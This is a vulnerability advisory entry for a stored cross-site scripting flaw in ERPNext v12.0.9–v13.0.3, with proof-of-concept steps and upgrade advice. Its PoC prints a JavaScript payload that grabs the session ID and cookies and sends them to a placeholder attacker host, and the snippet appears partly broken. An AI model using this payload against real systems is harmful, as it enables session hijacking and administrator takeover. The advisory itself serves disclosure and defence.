Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID? What is an MSC vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: June 22, 2022
OverviewIn ERPNext, versions v12.0.9-v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.
DetailsERPNext is affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’.
PoC Details1. Login to the application with low privileged user
2. Go to the settings option in the navigation bar and select my Settings.
3. Provide the malicious script in the ‘username’ field and click save. (from the PoC code)
4. Create a file named ‘test1.js’ and run an HTTP server (like python simple http server)
the content of the ‘test1.js’ file:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID.split(':');
getSID = getSID.match(te);
url = 'http://[attacker-ip]:[attacker-port]/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;
5. open a tab in Incognito and go to the ERPNext server and login with a high privileged user , it will be redirected to the malicious page.
6. After a successful login, the ‘sid’ parameter will be sent to the Attacker which can then use it to login as Administrator
Affected EnvironmentsERPNext versions v12.0.9 through v13.0.3
PreventionUpgrade to ERPNext version 13.1.0
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||Low|
|User Interaction (UI):||Required|
|Access Vector (AV):||Network|
|Access Complexity (AC):||Medium|